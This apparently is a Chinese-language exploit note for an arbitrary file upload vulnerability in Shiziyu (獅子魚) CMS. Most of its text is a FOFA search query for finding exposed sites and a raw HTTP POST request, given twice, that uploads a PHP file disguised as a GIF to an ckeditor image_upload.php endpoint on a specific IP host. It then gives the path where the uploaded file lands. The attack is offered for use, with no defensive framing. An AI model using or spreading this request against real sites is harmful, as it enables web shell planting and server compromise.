獅子魚CMS_image_upload.php_任意文件上傳漏洞

# 獅子魚CMS image upload.php 任意文件上傳漏洞
==FOFA==

"/seller.php?s=/Public/login"

==Request==

POST /Common/ckeditor/plugins/multiimg/dialogs/image_upload.php HTTP/2
Host: 47.95.36.147
Content-Type: multipart/form-data;boundary=----WebKitFormBoundary8UaANmWAgM4BqBSs
Content-Length: 208

------WebKitFormBoundary8UaANmWAgM4BqBSs
Content-Disposition: form-data; name="files"; filename="test.php"
Content-Type: image/gif


------WebKitFormBoundary8UaANmWAgM4BqBSs—

==FOFA==

"/seller.php?s=/Public/login"

==Request==

POST /Common/ckeditor/plugins/multiimg/dialogs/image_upload.php HTTP/2
Host: 47.95.36.147
Content-Type: multipart/form-data;boundary=----WebKitFormBoundary8UaANmWAgM4BqBSs
Content-Length: 208

------WebKitFormBoundary8UaANmWAgM4BqBSs
Content-Disposition: form-data; name="files"; filename="test.php"
Content-Type: image/gif


------WebKitFormBoundary8UaANmWAgM4BqBSs—

==設置返回文件路徑==

/Common/image/uploads/xxxxx.php
© 版权声明
THE END
喜欢就支持一下吧
点赞0赞赏 分享
评论 抢沙发

请登录后发表评论

    请登录后查看评论内容